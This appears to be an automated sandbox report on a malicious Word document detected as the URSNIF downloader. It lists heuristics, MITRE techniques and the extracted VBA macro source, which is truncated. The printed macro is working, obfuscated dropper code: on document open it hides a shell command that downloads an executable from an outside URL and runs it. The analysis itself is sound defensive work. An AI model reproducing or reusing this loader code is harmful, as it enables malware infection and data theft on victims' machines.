MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. This indicates a downloader or dropper functionality, likely to fetch and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' further supports this classification.
Heuristics 5
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4487 bytes |
SHA-256: 54b231bbe75613ed50f91d36bd81407a7b53d358373469ab6167d67d6d4f8a54 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OaXqjfHVQLN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Second "sGGaLUC" + "iCwo" + "njQwCq" + "52133419"
Second "iI" + "5796" + "hSiEuRmpYTIF" + "OaXI"
Shell AiQwoPu + fHLzGsaPf, CStr(vbHide)
Second "8899" + "hXHX"
Second "q" + "TNU"
Second "iBTQklJ" + "ETaLanPjGRZzAD" + "Vjid" + "R"
Second "500605033" + "221969526"
End Sub
Attribute VB_Name = "jHmkZEsSTBrZzn"
Function AiQwoPu()
On _
Error _
Resume _
Next
Second "294589820" + "2865"
Second "3720" + "a" + "6820" + "909"
Second "lC" + "6880"
HwAsXtZtlzH = Format(Chr(9 + 5 + 12 + 14 + 59)) + "md /V" + "/" + Format(Chr(6 + 3 + 8 + 9 + 41)) + Format(Chr(3 + 1 + 3 + 4 + 23)) + "^s^et " + "^" + "L^4^7=" + " ^ " + "^ ^ " + "^ ^ " + " ^" + " ^ ^" + " ^ "
Second "356748513" + "aDichjwouju" + "kqGVrUavjQf" + "PnCCKWRKwSo"
qIVrZcwb = " }^}{" + "^" + "h" + Format(Chr(9 + 5 + 12 + 14 + 59)) + "ta" + Format(Chr(9 + 5 + 12 + 14 + 59)) + "^};ka^" + "er^b^;" + "E^Tk$^"
Second "523982507" + "sc" + "LIR" + "ZYuvXIFbwEKXq"
Second "iuiY" + "knS" + "A" + "UcwVVIOtp"
TsrQlh = " m^e^t" + "^I-e" + "^kovn" + "I^" + ";)^E" + "Tk$ ," + "^z^Mi^$" + "(el^i" + "^" + "Fd^a" + "olnwo" + "D" + ".^"
Second "nO" + "iBNd"
Second "Kww" + "hkC" + "4040" + "24143268"
sKBKtTjYLTs = "O^G^q${" + "^yrt" + "^{)" + "u^Br^$" + "^ ni^"
Second "5401" + "5619" + "26" + "s"
Second "525978894" + "p"
Second "MjCJPLN" + "jGaib"
Second "ncc" + "jCJ" + "6394" + "XiWnqKEBlFYRPK"
wGYSOjAj = " ^z^Mi$" + "(h" + Format(Chr(9 + 5 + 12 + 14 + 59)) + "^aer^of" + "^;^'" + "^exe." + "^'+" + "D" + "^jL"
Second "TbsqZzJBAUi" + "267282477" + "6123" + "cwc"
Second "Yz" + "wOZBJvjCwkdojz"
Second "1915" + "9094"
Second "429898596" + "dzNUVHcdj" + "1981" + "vLbwrd"
DAhcASCzK = "^$^" + "+^'\" + "^'" + "+" + Format(Chr(9 + 5 + 12 + 14 + 59)) + "^" + "i" + "lb" + "u^p^:" + "vn^e^" + "$" + "^=" + "^ETk$;" + "'0^7" + "6'^ ^="
AiQwoPu = HwAsXtZtlzH + qIVrZcwb + TsrQlh + sKBKtTjYLTs + wGYSOjAj + DAhcASCzK
Second "UQMq" + "349209383" + "8707" + "OqY"
Second "hEoDowfjnTM" + "456806718"
End Function
Function fHLzGsaPf()
On _
Error _
Resume _
Next
Second "60676199" + "9991"
Second "92228593" + "kRW" + "zPFGMEjl" + "kK"
tJNOqhw = "^ " + "^D" + "jL" + "^$;" + ")" + "'@^'(^t" + "i^" + "lp^" + "S.^'" + "n^k" + "^t.5^" + "gmo" + "^=l?ph"
Second "uUuvaAm" + "skwlI" + "kGszTj" + "5146"
Second "cwcwH" + "9779" + "211823637" + "Ywc"
fpSCvLAqUv = "p^.tok" + "snap" + "o/TTR/^" + "mo" + Format(Chr(9 + 5 + 12 + 14 + 59)) + ".ds^ay" + "^te" + "^e"
Second "748" + "522682756" + "BHqoqVF" + "WUHawLBBs"
Second "4375" + "IqJU" + "857" + "503007343"
Second "173230803" + "DzWr" + "65172143" + "Tcsb"
MVIqaQTTiqj = "g" + "h^y" + "^tre" + "^dn^" + "a//^:^" + "p^t^" + "t^h" + "'=u" + "^Br^" + "$;^tnei" + "l" + Format(Chr(6 + 3 + 8 + 9 + 41)) + "^" + "b^e^W"
Second "351801460" + "333897738"
Second "rBIqBCwJ" + "GPQYoiP" + "VOcimbMQR" + "rXl"
Second "tc" + "370"
Second "335277422" + "428818352" + "H" + "3260"
EMQLTSTjHn = "^." + "^t^eN^" + " ^t" + Format(Chr(9 + 5 + 12 + 14 + 59)) + "ej" + "^" + "bo^-^" + "w" + "en=O" + "Gq$" + "^ l^l^" + "e" + "hsrew^"
Second "FSZwRXo" + "akjpNVis"
Second "6820" + "vBK"
Second "Kfp" + "520032118" + "o" + "329530133"
Second "527310460" + "PnT"
Second "EZwZjaFll" + "IW"
iEbRb = "op" + "&&^f" + "^or /^L" + " %" + "^k ^" + "in" + " (^2^6" + "5^;-^1" + "^;^" + "0)d^" + "o ^" + "s^e^t "
Second "26003729" + "7222"
Second "fD" + "nfjzrflXk"
thqXw = "^7^Mv=!" + "^7^Mv" + "!!^L^4" + "^7:~%" + "^k,1!" + "&&i^f" + " %^k ^" + "ls^s ^1" + " " + Format(Chr(9 + 5 + 12 + 14 + 59)) + "a^"
Second "f" + "jfEpkomciC"
Second "bPsJ" + "pohiQi" + "tvWb" + "aJjuPIK"
Second "VnD" + "LpEV"
Second "b" + "Lu"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.